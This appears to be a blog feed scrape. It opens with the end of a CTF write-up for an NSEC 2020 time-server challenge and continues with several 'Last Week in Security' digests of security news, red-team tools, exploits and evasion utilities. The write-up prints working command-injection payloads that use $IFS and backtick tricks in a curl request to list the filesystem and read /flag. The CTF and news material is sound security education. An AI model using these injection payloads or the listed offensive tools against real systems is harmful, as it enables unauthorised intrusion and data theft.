   0x76340b <main.main+59>:     lea    rcx,[rip+0x15f88e]        # 0x8c2ca0 <go.itab.net/http.Dir,net/http.FileSystem>
   0x763412 <main.main+66>:     mov    QWORD PTR [rax],rcx
   0x763415 <main.main+69>:     lea    rcx,[rip+0x156504]        # 0x8b9920
=> 0x76341c <main.main+76>:     mov    QWORD PTR [rax+0x8],rcx
   0x763420 <main.main+80>:     nop
   0x763421 <main.main+81>:     mov    rcx,QWORD PTR [rip+0x3ea038]        # 0xb4d460 <net/http.DefaultServeMux>
   0x763428 <main.main+88>:     mov    QWORD PTR [rsp],rcx
   0x76342c <main.main+92>:     lea    rcx,[rip+0xd6596]        # 0x8399c9
[------------------------------------stack-------------------------------------]
0000| 0xc000101ef8 --> 0x7d3200 --> 0x10 
0008| 0xc000101f00 --> 0xc0000fa0f0 --> 0x8c2ca0 --> 0x7cc380 --> 0x10 
0016| 0xc000101f08 --> 0xc000000180 --> 0xc000100000 --> 0xc000102000 --> 0x0 
0024| 0xc000101f10 --> 0xc000101f50 --> 0xc000101f58 --> 0x4321be (<runtime.main+542>:  mov    eax,DWORD PTR [rip+0x74895c]        # 0xb7ab20 <runtime.runningPanicDefers>)
0032| 0xc000101f18 --> 0x40714f (<runtime.closechan+479>:       jmp    0x40716e <runtime.closechan+510>)
0040| 0xc000101f20 --> 0xc000086058 --> 0x0 
0048| 0xc000101f28 --> 0x0 
0056| 0xc000101f30 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x000000000076341c      716     // "index.html".

Look at the string in RCX: static/. That's where the static files must be loaded from. We know that script.js and styles.css exist since they are loaded when we browse to / on the challenge server, so if we overwrite either of those and browse to them, we should get our command output!

At this point, my team and I tried many, many different Bash tricks to get command output locally. A breakthrough came when one teammate suggested using $* to separate $IFS from the next string. This allowed us to create spaces. I was excited. We had a clear path to the flag, and we just needed to locate and cat it. I ran the following expectantly:

$ curl time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \ 
-X '&&cd$IFS$*static&&find$IFS..|tee$IFS$*styles.css' >/dev/null`
$ curl time-server.ctf:8080/styles.css
..
../.bash_logout
../.bashrc
../.profile
../static
../static/script.js
../static/styles.css
../static/index.html
../static/time_server
../.viminfo
../main
../^time.json
../+time.json
../+outfile
../styles.css
../+outoutout
../index.html
../en_US.UTF-8
../test.html
../index.html.1
../time.json

travolta

Among the clutter of our output files, there was no flag. Fine, I'll just run find on the whole filesystem and grep the output. However, we can't use slashes, so find / is impossible. Here we could have cd .. a few times to get to / and then run find . but I was focused on using a slash. After a bunch more failed attempts I had this

$ # The command is: echo && cd static && ls -dF | tr -d . | tee styles.css
$ curl time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \
-X '&&cd$IFS$*static&&ls$IFS-dF|tr$IFS-d$IFS$*.|tee$IFS$*styles.css' >/dev/null

$ curl time-server.ctf:8080/styles.css
/

Great, now I can save a / character to a file and then cat that file to use / in the command.

$ curl time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \
-X '&&cd$IFS$*static&&ls$IFS-dF|tr$IFS-d$IFS$*.|tee$IFS$*slash' >/dev/null

$ # The command is: echo && cd static && find / | tee style.css
$ curl time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \
-X '&&cd$IFS$*static&&find$IFS$*`cat$IFS$*slash`|tee$IFS$*styles.css' >/dev/null

$ # A suspiciously long time later, the curl returns
$ wget time-server.ctf:8080/styles.css

styles.css was 64MB of find output. Undeterred, I was so close to the flag the size didn't slow me down.

$ grep -i flag styles.css 
/proc/sys/kernel/acpi_video_flags
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu0/domain1/flags
/proc/sys/kernel/sched_domain/cpu0/domain2/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain1/flags
/proc/sys/kernel/sched_domain/cpu1/domain2/flags
/proc/sys/kernel/sched_domain/cpu2/domain0/flags
/proc/sys/kernel/sched_domain/cpu2/domain1/flags
/proc/sys/kernel/sched_domain/cpu2/domain2/flags
/proc/sys/kernel/sched_domain/cpu3/domain0/flags
/proc/sys/kernel/sched_domain/cpu3/domain1/flags
/proc/sys/kernel/sched_domain/cpu3/domain2/flags
/proc/sys/kernel/sched_domain/cpu4/domain0/flags
/proc/sys/kernel/sched_domain/cpu4/domain1/flags
/proc/sys/kernel/sched_domain/cpu4/domain2/flags
/proc/sys/kernel/sched_domain/cpu5/domain0/flags
/proc/sys/kernel/sched_domain/cpu5/domain1/flags
/proc/sys/kernel/sched_domain/cpu5/domain2/flags
/proc/sys/kernel/sched_domain/cpu6/domain0/flags
/proc/sys/kernel/sched_domain/cpu6/domain1/flags
/proc/sys/kernel/sched_domain/cpu6/domain2/flags
/proc/sys/kernel/sched_domain/cpu7/domain0/flags
/proc/sys/kernel/sched_domain/cpu7/domain1/flags
/proc/sys/kernel/sched_domain/cpu7/domain2/flags
/proc/kpageflags

oh come on

No flag. Impossible. There had to be a flag. I asked the organizers to check our VM. The flag was there they said. Frantic, I used my newfound slash abilities to ls /. In retrospect, the find likely timeout and was killed by time_server before it could list /flag.

$ # The command is: echo && cd static && ls / | tee styles.css
$ curl -v time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \
-X '&&cd$IFS$*static&&ls$IFS$*`cat$IFS$*slash`|tee$IFS$*styles.css' >/dev/null

$ curl time-server.ctf:8080/styles.css
bin
boot
dev
etc
flag
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

$ # The command is: echo && cd static && cat /flag | tee styles.css
$ curl -v time-server.ctf:8080/?mlaasdkfasldkfm=0739a949de455a1f745a8d3dcc4b179a \
-X '&&cd$IFS$*static&&cat$IFS$*`cat$IFS$*slash`flag|tee$IFS$*styles.css' 

$ curl time-server.ctf:8080/styles.css
FLAG-ac0c58453b7208f9ee9d204b54988b98

score

I am positive there were simpler ways to solve this challenge, but no one can take away the feeling of finally getting a challenge after struggling for hours.

NSEC 2020 was a ton of fun, and we'll be back next year.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-05-25

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-05-18 to 2020-05-25. MITRE ATT&CK techniques are in brackets where appropriate.

News

  • Privacy News
    • Why is This Website Port Scanning me? Websockets are being used for "anti-fraud" scans of website user's local machines. The theory is that if a user is running a VNC or other remove desktop server, they may be part of a botnet/click farm operation I suppose. If you are a developer this could be especially dangerous. In Firefox, setting network.websocket.max-connections to 0 will disable websockets, but lots of modern web applications rely on them.
    • Abusing WebRTC to Reveal Coarse Location Data in Signal abused WebRTC on both iOS and Android in order to reveal the user's ENDS client subnet, which could reveal a rough location (~400 mile radius). The bug has been patched in the latest version of Signal.
  • macOS 10.15 Catalina notarization news
    • Catalina is checking notarization of unsigned executables started the firestorm, bringing to light that macOS sends the hash of every executable not whitelisted in System Preferences as a "Developer Tool" to Apple.
    • How my application ran away and called home from Redmond is an example of arguably more invasive behavior on Windows. Additionally, "SmartScreen" also profiles and reports "usual" executions to Microsoft.
    • This effectively gives Apple a list of binaries being run by every user, without a way to disable it (besides going fully offline).
    • Inside the NSA’s Secret Tool for Mapping Your Social Network shows the power of massive metadata collection, and its ability for misuse. Perhaps tomorrow Apple receives a request for all users that have run the Tor browser in your country.
    • A happy medium would be to push a bloom filter of known hashes to end users and perform local lookups, only sending hashes that don't hit the bloom filter to Apple for further analysis. This is what Google Chrome does for phishing site lookups (until Enhanced Safe Browsing Protection is enabled). Users should also be given the ability to opt out of such features.
  • New DNS Vulnerability Lets Attackers Launch Large-Scale DDoS Attacks With up to 1000x traffic amplification, this will likely see exploitation soon. If you are responsible for DNS severs, patch them quickly.
  • GitLab 13.0 released with many new changes. The biggest for most users will likely be the new "Deploy to Amazon ECS" that makes AWS a first class citizen for deployments and monitoring on par with previously supported Google Cloud.
  • Enhanced Safe Browsing Protection now available in Chrome will check uncommon URLs in real time. Phishing against Chrome users just got harder.
  • Jailbreak for iOS 11.0-13.5 for all iOS devices released. After a few tough iOS releases, the jailbreaking scene is back in full force. First checkra1n, and now a fast, reliable jailbreak for every iOS device on the latest, signed version. Hats off to the hackers that have kept pushing Apple despite new security additions to iOS (i.e. Pointer Authentication). Why release this 0day now? Perhaps the iOS 14 leak gave the jailbreak developers enough insight to see that it was patched. Add build.frida.re to your cydia repo list and start hacking those iOS apps! [T1068 Exploitation for Privilege Escalation]

Techniques

Tools and Exploits

  • ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection using TLS certificate with elliptical curve cryptography. Think of it as Meterpreter with Autoroute + Socks4a, but more stable and faster. This can be used stand-alone or incorporated into an in-house Go tool. [TA0008 Lateral Movement]
  • njsscan is a semantic aware SAST tool that can find insecure code patterns in your Node.js applications.
  • axiom is a set of utilities for managing a small dynamic infrastructure setup for bug bounty and pentesting. If you are a Digital Ocean user and want an easy way to spin up red teaming or bug bounty infrastructure, this may be the tool for you.
  • Cisco AnyConnect < 4.8.02042 privilege escalation through path traversal. It wouldn't be last week in security without a Windows local privilege escalation. This standalone C# exploit uses DLL hijacking with vpndownloader.exe, the update binary for Cisco AnyConnect. I suspect this particular exploit will be useful for many months as enterprises are slow to update their VPN clients. [T1068 Exploitation for Privilege Escalation]
  • WerTrigger is a powerful new primitive to weaponize file write exploits. Prior to Windows 10 1909 there was the DiagHub DLL loading primitive, but since then we have only had UsoDllLoader. Now there is another option, and when the next file write exploit is found that allows unprivileged users to write files to C:WindowsSystem32, WerTrigger will be there to pop the SYSTEM shell. [T1068 Exploitation for Privilege Escalation]
  • XLMMacroDeobfuscator can be used to decode obfuscated XLM macros (also known as Excel 4.0 macros). It utilizes an internal XLM emulator to interpret the macros, without fully running the code. [T1066 Indicator Removal from Tools]
  • shotlooter is a recon tool that finds sensitive data inside the screenshots uploaded to prnt.sc.
  • petaqc2 is a .NET Core/Framework RAT that uses websockets as Command & Control (C2) channels. It's designed to provide a Proof of Concept (PoC) websocket malware to the adversary simulation exercises (Red & Purple Team exercises).
  • quickreg is an experimental search engine for developers. It searches a curated subset of the web: official docs and community-driven sources. No JS, cookies, tracking, external requests or data collecting.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • guardedbox Online client-side manager for secure storage and secrets sharing. This could be useful for sharing scope lists, reports, or other sensitive information with clients that don't use PGP or are unable to use your encrypted email solution.
  • jaeles is a powerful, flexible, and easily extensible framework written in Go for building your own Web Application Scanner.
  • maddy is a composable all-in-one mail server. If you have ever spent half a day setting up a phishing mail server by hand, the short setup docs for maddy should get you excited. Two commands (and DNS setup) and you have DKIM, SPF, DMARC, MTA-STS, DANE, and STARTTLS Everywhere.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-06-01

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-05-25 to 2020-06-01. MITRE ATT&CK techniques are in brackets where appropriate.

News

  • Israeli cyber chief: Major attack on water systems thwarted. A cyber attack was reportedly detected and thwarted in real time and had it not be chlorine or other chemicals could have been mixed into the water source in the wrong proportions and resulted in a β€œharmful and disastrous” outcome. Israel's national cyber chief said, β€œCyber winter is coming and coming even faster than I suspected. We are just seeing the beginning.”
  • Return of the iOS sandbox escape: lightspeed's back in the race!! Synacktiv describes the old-but-new XNU bug that was re-introduced in iOS 13 and was the basis for last week's iOS 0day based jailbreak. [T1068 Exploitation for Privilege Escalation]
  • Zero-day in Sign in with Apple Speaking of Apple's mistakes, this one is quite bad. When requesting a JSON web token during the "Sign in with Apple" process, swapping the email for another user would return a valid JWT that can authenticate to the 3rd party service. This is the equivalent to editing a cookie from "user" to "admin" and getting the admin page. How this got through internal testing and into production is beyond me. [T1078 Valid Accounts]
  • LadderLeak: Breaking ECDSA With Less Than One Bit Of Nonce Leakage describes how a novel side-channel vulnerability can lead to leaking the most significant bit of the nonce and eventually breaking ECDSA, including NIST curves like P-192 (P-256 is vulnerable in theory). Curve25519 contains a countermeasure against this attack, but, "its exact efficacy against side-channel attacks in [this] context is not entirely clear."
  • Releasing the CAPTCHA Cracken. Despite the name there is no tool release, but F-Secure Labs shows off its ability to automate the CAPTCHA in use with the Office 265 Outlook Web Application, allowing its red team to attempt password stuffing. If you solely rely on CAPTCHA to stop bots/automated tools, it's time to rethink your strategy. Demo here.

Techniques

Tools and Exploits

  • httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.
  • Seatbelt, while technically not a new tool got a huge rewrite. Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. [T1082 System Information Discovery]
  • BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstruct TCP sessions, extract hashes of encrypted passwords and even convert them to a Hashcat format in order to perform an offline Brute Force attack. [T1040 Network Sniffing]
  • angry_gadget - This tool is written in python and uses angr to test constraints for gadgets executing execve('/bin/sh', NULL, NULL). If you've run out gadgets to try from OneGadget, Angry Gadget gives a lot more with complicated constraints to try!
  • ezEmu enables users to test adversary behaviors via various execution techniques. Sort of like an "offensive framework for blue teamers", ezEmu does not have any networking/C2 capabilities and rather focuses on creating local test telemetry. Use this (or atomic-red-team) to test your SEIM, EDR, or SOC response.
  • EXCELntDonut is a XLM (Excel 4.0) macro generator. Start with C# source code (DLL or EXE) and end with a XLM (Excel 4.0) macro that will execute your code in memory. XLM (Excel 4.0) macros can be saved in .XLS files. [T1193 Spearphishing Attachment]
  • sgn Shikata ga nai encoder ported into go with several improvements including 64 bit support, smaller decoder stub, no visible loop condition, decoder stub obfuscation, and safe register option. Build this into your in house packer for better obfuscation. [T1066 Indicator Removal from Tools]
  • Corporate_Masks are 8-14 character Hashcat masks based on analysis of 1.5 million NTLM hashes cracked while pentesting. [T1078 Valid Accounts]
  • AMSITrigger will identify all of the malicious strings in a powershell file, by repeatedly making calls to AMSI using AMSIScanBuffer, line by line. On receiving an AMSI_RESULT_DETECTED response code, the line will then be scrutinised to identify the individual triggers. [T1066 Indicator Removal from Tools]

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-06-08

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-06-01 to 2020-06-08. No MITRE ATT&CK techniques are in brackets this week, too much content!

News

Techniques

Tools and Exploits

  • epic_shell is a new PHP webshell with encryption that shows a decoy 404 page for anyone browsing it without the proper key. shell_exec is required for proper functionality.
  • SMBGhost_RCE_PoC is the remote version of the LPE released a few months ago that works against Windows 10 1903 (SMBv3 compression). Full technical writeup here.
  • CVE-2020-3956 is a proof of concept exploit for a VMware Cloud Director remote code execution vulnerability. Full writeup here, demo here.
  • Covenant v0.5 is not a new tool but this update includes a new cross platform .Net-Core implant: Brutes.
  • shad0w is a post exploitation framework designed to operate covertly on heavily monitored environments from @_batsec_ and is written in C, uses syscalls, blocks userland API hooking, and can load basically anything (.Net, DLL, EXE, VBS, JS, XSL) into memory. Code here.
  • kerbrute is a script to perform kerberos bruteforcing by using impacket.
  • HawkEye is a malware dynamic instrumentation tool based on frida.re framework. It will hook common functions to log malware activities and output the results in a nice web page report. Use it in your sandbox to get nice HTML reports. Demo here.
  • SharpCollection is a repository of nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines. Great use of CI to keep tools fresh and built for different framework versions.
  • SwiftBelt is a macOS enumerator inspired by @harmj0y's Windows-based Seatbelt enumeration tool. SwiftBelt does not utilize any command line utilities and instead uses Swift code (leveraging the Cocoa Framework, Foundation libraries, OSAKit libraries, etc.) to perform system enumeration. This can be leveraged on the offensive side to perform enumeration once you gain access to a macOS host. I

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in fast and comprehensive way. This one is fairly new (30 days) so it must have slipped by, but looks to have very good results for a one shot subdomain enumeration tool. Give it a try on your next assessment or bug bounty.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-06-15

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-06-08 to 2020-06-15. MITRE ATT&CK techniques are in brackets where appropriate.

News

Techniques

Tools and Exploits

  • penglab - Abuse of Google Colab for fun and profit. Google Colab is a free cloud service based on Jupyter Notebooks for machine-learning education and research. It provides a runtime fully configured for deep learning and free-of-charge access to a robust GPU. I'm surprised it took this long to get abused.

  • Windows Local Privilege Escalation [T1068 Exploitation for Privilege Escalation]

    • Windows: Insecure CSharedStream Object EoP The great @tiraniddo develops his 8 month old "Won't Fix" Windows local privilege escalation bug into a full blown normal user to SYSTEM PoC. Expect to see this weaponized and in use in by next week and have a long shelf life.
    • VirtToPhys is a small PoC to demonstrate how you can calculate the physical address for a kernel virtual address when exploiting driver bugs that allow you to map physical memory. VirtToPhys uses MsIo.sys, a WHQL signed driver that gives you colorful lights on your RAM (yes, seriously), CVE-2019-18845.
    • SuRestore.cpp - If you find yourself in the Backup Operators group, this little gem based on older research may be able to get you a SYSTEM shell.
    • spoolsystem is a CNA script for Cobalt Strike which uses @itm4n Print Spooler named pipe impersonation trick (LWiS 2020-05-18) to gain SYSTEM privileges without creating any new process or relying on cross-process shellcode injection (if the selfinject method is used).
  • libimobiledevice is a collection of projects that allow for cross-platform protocol library to access iOS devices. This is the first release after a three year hiatus, and sees the release of two new tools, libirecovery and idevicerestore.

  • SearchOutlook is a C# tool to search through a running instance of Outlook for keywords.

  • choose is a human-friendly and fast alternative to cut and (sometimes) awk. This may prove useful for cleaner pipelines for automated reconnaissance, etc.

  • SharpBlock is a method of bypassing EDR's active projection DLL's by preventing entry point execution. Blog post here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • UtahFS is an encrypted storage system that provides a user-friendly FUSE drive backed by cloud storage in Go by CloudFlare. Use this to store things securely in the cloud - think DropBox but encrypted locally before upload.
  • Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS. The tool is based on returned status code.
  • urlcrazy generates and tests domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage.
  • PowerSharpPack is many useful offensive CSharp Projects wrapped into Powershell for easy usage.
  • revp is a C++ reverse HTTP proxy that works on Linux, Windows, and macOS.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-06-22

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-06-15 to 2020-06-22. MITRE ATT&CK techniques are in brackets where appropriate.

News

  • CobaltStrike: Beacon Object Files - CobaltStrike continues to deliver advanced adversary emulation capabilities. This update brings the ability for a beacon to run compiled code in its own context, with beacon itself taking care of linking and loading the object file. This provides massive OPSEC advantages over forking a new process, but does come with a few downsides - crashing your shiny new BOF crashes your beacon. I expect lots of new techniques to come out with BOF implementations in the future to frustrate AV/EDR. Demo here.
  • Advisory 2020-008: Copy-paste compromises - tactics, techniques and procedures used to target multiple Australian networks. The Australian Government has officially stated that a "sophisticated state-based actor" is targeting the Australian government and Australian companies. While they don't name a country, it doesn't take an expert in foreign policy to pick China as the overwhelming favorite for this attack.
  • Dark Basin Uncovering a Massive Hack-For-Hire Operation. Citizenlab exposes BellTroX, an Indian hack-for-hire firm, due to their shockingly bad OPSEC. Using your own real CV to test a URL shortener?! The reader is left to wonder how many similar operations are taking place, but with better OPSEC. Want to know more? The great Risky Business has a feature podcast all about it.
  • FBI used Instagram, an Etsy review, and LinkedIn to identify a protestor accused of arson. Another OPSEC fail; if Bellingcat can do good OSINT, law enforcement can too. Wearing a shirt you can only get from an Etsy seller means your address is one subpoena away. Looks like the alleged arsonist didn't read OPSEC for Activists: #5 - Choose your clothing carefully.
  • Apple plays Godfather in Mafia-esque shakedown of developers. This is the same battle Spotify has been fighting. It boils down to Apple demanding 30% of signup fees for signups in an app on iOS. That is perhaps at the edge of reasonable, but now they are removing apps that have signups outside the app but have no ability to sign up in app (think Netflix, Spotify, etc). This policy is inconsistently enforced, and targeting a very vocal David Heinemeier Hansson is a mistake. Apple then sent out this message to developers before WWDC! First the Coreillium debacle and now this? Who is making these calls at Apple?
  • Hacking Starbucks and Accessing Nearly 100 Million Customer Records. A proxy between the Starbucks frontend and backend allowed researches to access a Microsoft Graph instance with nearly 100 million customer records. They reported the issue as soon as they verified they could access the base records, but there were lots of interesting endpoints that didn't get explored and would likely have been even more damaging. The $4,000 bounty for this seems extremely low.
  • Flatpak - a security nightmare. App distribution on Linux isn't great, and Flatpak from RedHat tried to solve that. Sadly, it looks as though they have some significant work to do on the security front.
  • 19 Zero-Day Vulnerabilities Amplified by the Supply Chain. The so-called "Ripple 20" vulnerabilities effect the TCP/IP library by Treck, Inc. Never heard of Treck's TCP/IP library? I hadn't either, but it's in everything from the UPS in your server rack, your printer, and the infusion pump in your operating room. Remote code execution with a malformed IPv4 packet is about as bad as a vulnerability gets, but the really scary vulnerability is the RCE from a nearly RFC compliant DNS response. State backed attackers or others with the ability to do DNS cache poisoning are going to be very excited by this. Expect to see these vulnerabilities in network attached UPSs and other IoT devices on assessments for the next decade. @SwitHak has put together a list of vulnerable vendors/devices as well as network detection rules: BlueTeam CheatSheet.

Techniques

Tools and Exploits

  • Digging Your Talons In – New Take On Password Guessing. The researches at Optiv spent some time seriously considering how to do password guessing right, and boy did they develop quite a tool. Talon takes password guessing attacks to a new level with tricks like not sending an encryption type with a TGT request to kerberos which allows username enumeration without any failed logons (i.e. won't lock accounts). It also intelligently detects account lockouts over both kerberos and LDAP, and will rotate attempts between different domain controllers if multiple are present. Best of all, both the Kerberos TGT request and LDAP BIND auth request are not logged by default. Spray away! [T1078.002 Valid Accounts: Domain Accounts]
  • Composr CMS Remote Code Execution. This post shows the process of finding and exploiting a PHP unserialize function to achieve unauthenticated remote code execution. [T1190 Exploit Public-Facing Application]
  • USBSamurai β€” A Remotely Controlled Malicious USB HID Injecting Cable for less than 10$. If the O.MG cable is out of your price range, this might be more your style. All in this cable and the wireless dongle is less than $25 as long as you are willing to solder it up yourself. [T1200 Hardware Additions]
  • OutlookSend is a C# tool to send emails through Outlook from the command line or in memory. Designed to be used through execute-assembly in your favorite C2 Framework (i.e. CobaltStrike). Use this in companion with last week's SearchOutlook.
  • Evasor is an automated security assessment tool which locates existing executables on the Windows operating system that can be used to bypass any Application Control rules. Cyberark has a great writeup with demo on their blog. This is going to automate a lot of work on your next assessment with AppLocker; it even takes screenshots and generates a report! Cyberark neutered the tool a bit by not including the DLLs or other files used to pop shells, but I'm sure the community will fork and update the project soon. Blue teams using AppLocker should use this for self-assessment, and determine how to detect bypasses using other tools. [Thanks to @StevoLowson for the tip!]
  • ADSearch is a tool written for cobalt-strike's execute-assembly command that allows for more efficient querying of AD. [T1087.002 Account Discovery: Domain Account]
  • CVE-2020-1170 - Microsoft Windows Defender Elevation of Privilege Vulnerability. At this point @itm4n has made it into the hall of fame of Windows exploiters. This week sees yet another local elevation of privilege vulnerability, using Windows Defender's log rotation mechanism to delete an arbitrary directory. From directory deletion to SYSTEM shell gets you the rest of the way. By setting the defender update source to the local machine, the log can be filled in ~40 minutes. This post is very thorough and walks through the entire process of finding the vulnerability - top notch reporting.
  • avcleaner is a C/C++ source obfuscator for antivirus bypass. The researchers at SCRT really got into the weeds of clang/LLVM with this tool and came out with a FUD meterpreter. The blog post is very much worth a read.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-06-29

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-06-22 to 2020-06-29. MITRE ATT&CK techniques are in brackets where appropriate.

News

  • Cobalt Strike 4.1 – The Mark of Injection. The beacon object files feature teased last week has been released along with improved safe-inject and more tunable SMB and TCP traffic parameters to defeat signature based detections.
  • 2020 Worldwide Developers Conference. Apple announced a lot, but the big news was the 2-year transition of macOS to custom ARM chips. iOS exploit developers just got a whole new target space! The A12X powered Developer Transition Kits (ARM based Mac Mini) have started to arrive, and it's only a matter of time before security researchers get their hands on some.
  • WireGuard Merged Into OpenBSD. Get ready for native WireGuard in the kernel in pfSense and OPNSense firewalls.
  • Moroccan Journalist Targeted With Network Injection Attacks Using NSO Group’s Tools. "Network Injection" attacks and rouge cell towers, this thorough report from Amnesty International lays out in detail how NSO Group assisted the Moroccan government in performing exploitation of journalists. The evidence of NSO Group willfully ignoring how its products are used is mounting, and I wouldn't be surprised if they are next up on Phineas Fisher's hit list.

Techniques

Tools and Exploits

  • ChopChop is a CLI for scanning endpoints and identifying exposition of services/files/folders through the webroot. Add this to your tool list for web assessments or bug bounties.
  • Max is a command line tool to interact with the Neo4j database that powers BloodHound. This tool allows easy access to users and groups with lots of good built in filters. It also allows raw Cypher queries against the database for advanced users. [T1087.002 Account Discovery: Domain Account]
  • SharpHungarian is a rough proof of concept that uses comments on a VirusTotal file for command and control. [T1102.002 Web Service: Bidirectional Communication]
  • FileSearcher is an unmanaged assembly file searcher for when a fully interactive beacon session is not opsec safe enough. Find those Passwords.txt or Passwords.xlsx files easily with this tool. [T1005 Data from Local System]
  • Clippi-B is an unmanaged assembly clipboard stealer for use with CobaltStrike or any other unmanaged CLR loader (i.e. shad0w). [T1115 Clipboard Data]
  • pencode is a tool that helps you to create payload encoding chains. It has been designed to be used in automation wherever it is required to apply multiple encodings to a payload (and possibly inserting the payload to a template in between). This will be helpful for web application penetration testers or bug bounties.
  • browsertunnel is a tool for exfiltrating data from the browser using the DNS protocol. It achieves this by abusing dns-prefetch, a feature intended to reduce the perceived latency of websites by doing DNS lookups in the background for specified domains. DNS traffic does not appear in the browser's debugging tools, is not blocked by a page's Content Security Policy (CSP), and is often not inspected by corporate firewalls or proxies, making it an ideal medium for smuggling data in constrained scenarios. [T1071.004 Application Layer Protocol: DNS]
  • CVE-2020-10665 is a proof of concept for Docker Desktop Local Privilege Escalation on Windows. This is the same researcher from last week's Starbucks writeup. Well done! [T1068 Exploitation for Privilege Escalation]
  • CVE-2020-1054 is a proof of concept for a Windows 7 kernel vulnerability that leads to local privilege escalation. Blog post with details here. [T1068 Exploitation for Privilege Escalation]
  • BananaPhone is a pure-go implementation of using direct syscalls in the spirit of HellsGate (LWiS 2020-06-08). [T1027.005 Obfuscated Files or Information: Indicator Removal from Tools]

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • aviary.sh is a minimal distributed configuration management in bash. Each host periodically fetches the latest version of the inventory to see what roles it should be performing. If you have struggled with Ansible, Chef, Puppet, or Salt in the past or they were just too much for a simple configuration management job, give aviary.sh a shot. Need slightly more power but don't wan't to step all the way up to the "major" configuration managers? pyinfra might be what you are looking for.
  • Flatseal is a graphical utility to review and modify basic permissions from your Flatpak applications. If last week's news about Flatpak security got you worried, Flatseal can help audit applications or modify them for malicious redistribution during an assessment.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-07-06

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-06-29 to 2020-07-06. MITRE ATT&CK techniques are in brackets where appropriate.

News

Techniques

Tools and Exploits

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • Secretive is an app for storing and managing SSH keys in the Secure Enclave. It is inspired by the sekey project, but rewritten in Swift with no external dependencies and with a handy native management app. If you have a Mac or manage Macs this is another level of protection for SSH keys, and Macs without a secure enclave can use other sources such as a Yubikey.
  • velociraptor is a tool for collecting host based state information using Velocidex Query Language (VQL) queries. A simple to deploy single binary agent and server for incident response.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-07-13

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-07-06 to 2020-07-13. MITRE ATT&CK techniques are in brackets where appropriate.

News

Techniques

Tools and Exploits

  • CVE-2020-1300: Remote Code Execution Through Microsoft Windows CAB Files. The PathCchCanonicalize function strikes again, this time when opening a CAB file or installing a printer. In the case of the printer, arbitrary file write (and therefore remote code execution) is achieved as SYSTEM. No public proof of concepts exist yet, but there is enough detail in the post to craft your own.
  • Incoming .NET SQLClient introduces a .NET MSSQL client that can be used with any in-memory .NET loader (i.e. Cobalt Strike's execute-assembly) for use during post-exploitation activities. [TA0009 Collection]
  • tsunami-security-scanner is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence from Google. This scanner and nuclei are recent open source competitors to Tenable's Nessus.
  • SNOWCRASH creates a script that can be launched on both Linux and Windows machines. Payload selected by the user (in this case combined Bash and Powershell code) is embedded into a single polyglot template, which is platform-agnostic. I could see this being used for a cross-platform stage 1 payload against cross-platform target applications (i.e. Apache struts). [T1059 Command and Scripting Interpreter]
  • VBA-Stendhal injects encrypted commands into EMF shapes for C2 in VBA/Office malware. This is really cool Macro/VBA work by @Laughing_Mantis, and you can read more about how the technique works here. [T1562 Impair Defenses]
